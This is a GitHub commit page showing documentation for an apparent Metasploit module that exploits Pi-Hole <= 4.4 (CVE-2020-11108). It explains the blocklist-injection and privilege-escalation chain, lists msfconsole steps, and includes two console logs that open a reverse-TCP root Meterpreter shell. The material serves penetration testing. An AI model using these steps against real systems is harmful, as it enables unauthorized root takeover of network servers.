-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #13445, Pi-Hole <= 4.4 root RCE CVE-2020-11108
- Loading branch information
Showing
2 changed files
with
403 additions
and
0 deletions.
There are no files selected for viewing
142 changes: 142 additions & 0 deletions
142
documentation/modules/exploit/unix/http/pihole_blocklist_exec.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,142 @@ | ||
## Vulnerable Application | ||
|
||
This exploits a command execution in Pi-Hole <= 4.4. A new blocklist is added, and then an | ||
update is forced (gravity) to pull in the blocklist content. PHP content is then written | ||
to a file within the webroot. | ||
|
||
Phase 1 writes a sudo pihole command to launch teleporter, effectively running a priv esc. | ||
|
||
Phase 2 writes our payload to `teleporter.php`, overwriting, the content. | ||
|
||
Lastly, the phase 1 PHP file is called in the web root, which launches | ||
our payload in `teleporter.php` with root privileges. | ||
|
||
A more detailed writeup is available from the [original author](https://frichetten.com/blog/cve-2020-11108-pihole-rce/). | ||
|
||
Due to encodings, a local web server is required to be running on port `80`. | ||
|
||
Two blocklist is left within Pi-Hole and should be removed. | ||
|
||
## Verification Steps | ||
|
||
1. Install the application | ||
2. Start msfconsole | ||
3. Do: ```use exploit/unix/http/pihole_blocklist_exec``` | ||
4. Do: ```set srvhost [IP]``` | ||
5. Do: ```set rhost [IP]``` | ||
6. Do: ```run``` | ||
7. You should get a root shell. | ||
|
||
## Options | ||
|
||
### Password | ||
|
||
Password for the web interface. Randomly set on install. Use `pihole -a -p` to change/remove it. | ||
|
||
## Scenarios | ||
|
||
### Pi-Hole 4.3.2 on Ubuntu 18.04 | ||
|
||
``` | ||
[*] Processing pihole.rb for ERB directives. | ||
resource (pihole.rb)> use exploit/unix/http/pihole_blocklist_exec | ||
resource (pihole.rb)> set payload php/meterpreter/reverse_tcp | ||
payload => php/meterpreter/reverse_tcp | ||
resource (pihole.rb)> set rhosts 2.2.2.2 | ||
rhosts => 2.2.2.2 | ||
resource (pihole.rb)> set lhost 1.1.1.1 | ||
lhost => 1.1.1.1 | ||
resource (pihole.rb)> set srvhost 1.1.1.1 | ||
srvhost => 1.1.1.1 | ||
resource (pihole.rb)> set srvport 80 | ||
srvport => 80 | ||
resource (pihole.rb)> set verbose true | ||
verbose => true | ||
resource (pihole.rb)> exploit | ||
[*] Exploit running as background job 0. | ||
[*] Exploit completed, but no session was created. | ||
[*] Started reverse TCP handler on 1.1.1.1:4444 | ||
msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.3.2 | ||
[*] Using URL: http://1.1.1.1:80/ | ||
[*] Using cookie: PHPSESSID=45abdcp4rsc9bpi9tchi88ejnn; | ||
[*] Using token: WzmrFbksWxIbtuSVeyrf8yv9o541UdhueLN+BRXfUmY= | ||
[*] Adding backdoor reference | ||
[*] Forcing gravity pull | ||
[*] (1/2) Sending priv esc trigger | ||
[*] Adding root reference | ||
[*] Forcing gravity pull | ||
[*] (2/2) Sending root payload | ||
[*] Popping root shell | ||
[*] Sending stage (38288 bytes) to 2.2.2.2 | ||
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:57982) at 2020-05-12 22:30:38 -0400 | ||
[+] Deleted cdJWzln.php | ||
[*] Server stopped. | ||
msf5 exploit(unix/http/pihole_blocklist_exec) > sessions -1 | ||
[*] Starting interaction with 1... | ||
meterpreter > getuid | ||
Server username: root (0) | ||
meterpreter > sysinfo | ||
Computer : pihole | ||
OS : Linux pihole 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64 | ||
Meterpreter : php/linux | ||
``` | ||
|
||
### Pi-Hole 4.4 on Ubuntu 18.04 | ||
|
||
``` | ||
[*] Processing pihole.rb for ERB directives. | ||
resource (pihole.rb)> use exploit/unix/http/pihole_blocklist_exec | ||
resource (pihole.rb)> set payload php/meterpreter/reverse_tcp | ||
payload => php/meterpreter/reverse_tcp | ||
resource (pihole.rb)> set rhosts 2.2.2.2 | ||
rhosts => 2.2.2.2 | ||
resource (pihole.rb)> set lhost 1.1.1.1 | ||
lhost => 1.1.1.1 | ||
resource (pihole.rb)> set srvhost 1.1.1.1 | ||
srvhost => 1.1.1.1 | ||
resource (pihole.rb)> set srvport 80 | ||
srvport => 80 | ||
resource (pihole.rb)> set verbose true | ||
verbose => true | ||
resource (pihole.rb)> exploit | ||
[*] Exploit running as background job 0. | ||
[*] Exploit completed, but no session was created. | ||
[*] Started reverse TCP handler on 1.1.1.1:4444 | ||
msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.4 | ||
[*] Using URL: http://1.1.1.1:80/ | ||
[*] Using cookie: PHPSESSID=uee4gcfsjk5m8289m4uk4rv1du; | ||
[*] Using token: uO4ha1e0fy+Qwvoq14XgslT3Z+VJ/h2RR3qyVT6dPz8= | ||
[*] Adding backdoor reference | ||
[*] Forcing gravity pull | ||
[*] Received GET request. Responding | ||
[*] Sending 2nd gravity update request. | ||
[*] Forcing gravity pull | ||
[*] (1/2) Sending priv esc trigger | ||
[*] Adding root reference | ||
[*] Forcing gravity pull | ||
[*] Received GET request. Responding | ||
[*] Sending 2nd gravity update request. | ||
[*] Forcing gravity pull | ||
[*] (2/2) Sending root payload | ||
[*] Popping root shell | ||
[*] Sending stage (38288 bytes) to 2.2.2.2 | ||
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:48636) at 2020-05-13 20:34:33 -0400 | ||
[+] Deleted VRwxqyhs.php | ||
msf5 exploit(unix/http/pihole_blocklist_exec) > sessions -1 | ||
[*] Starting interaction with 1... | ||
meterpreter > getuid | ||
Server username: root (0) | ||
meterpreter > sysinfo | ||
Computer : pihole | ||
OS : Linux pihole 4.15.0-99-generic #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020 x86_64 | ||
Meterpreter : php/linux | ||
meterpreter > | ||
[*] Blocklists must be removed manually from /admin/settings.php?tab=blocklists | ||
[*] Server stopped. | ||
``` |
Oops, something went wrong.